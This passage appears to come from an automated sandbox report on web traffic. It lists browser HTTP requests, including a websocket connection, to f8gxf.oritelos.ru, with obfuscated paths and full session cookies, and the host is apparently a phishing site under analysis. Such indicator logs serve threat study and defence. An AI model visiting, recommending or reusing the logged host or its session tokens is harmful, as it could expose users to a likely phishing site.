laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /uvDdGeSZoeTtRzRnIUZPopyUbvj6WcjtQgkM34130 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opLQsPK25rFRhKntGwA2ZNghA8uNUx4nbVsIB5YEpt45139 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klIQ39laQFjey0i6xGLP3ZDteNpdd3cDZBKGgtt891okNrKdibFlqrS1cZWOM1UJUDFXOGwYKo5Fyz230 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klpWKk32gxuOs7NipwmTvBAiwrwHsZdCtNCzija15cfNIJA8Jl2SAW0BE2ZBBrAhRNr49wx220 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mnq9zg5en0UR6op8OO6uGL6YZg61eBRuv044uU7ylswf1pghT78145 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /34HEkFr4q1WYO5T8k73FNznYijhCiUxn12JK89110 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijadGOWmNjA7SxTV0q2ozi0cdBA9W0dAH33Z3eJlsCHRIWwOz56169 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /uvDdGeSZoeTtRzRnIUZPopyUbvj6WcjtQgkM34130 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opLQsPK25rFRhKntGwA2ZNghA8uNUx4nbVsIB5YEpt45139 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /yzOnhObGr29YVTEpoKHxwCt0Ttl0TsRXrtnmnc8YXG0k8Gp4YhObKRadM5FYz8Eab180 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: f8gxf.oritelos.ruConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://f8gxf.oritelos.ruSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3DSec-WebSocket-Key: Rt7K0lK8LYeW+ERTFM2ZsA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
              Source: global trafficHTTP traffic detected: GET /opjc6DkU8Xus4dQkMciD0UZh1ELijK7hhF1rdvmX5P87aPDjO8cXDnccd199 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mnq9zg5en0UR6op8OO6uGL6YZg61eBRuv044uU7ylswf1pghT78145 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 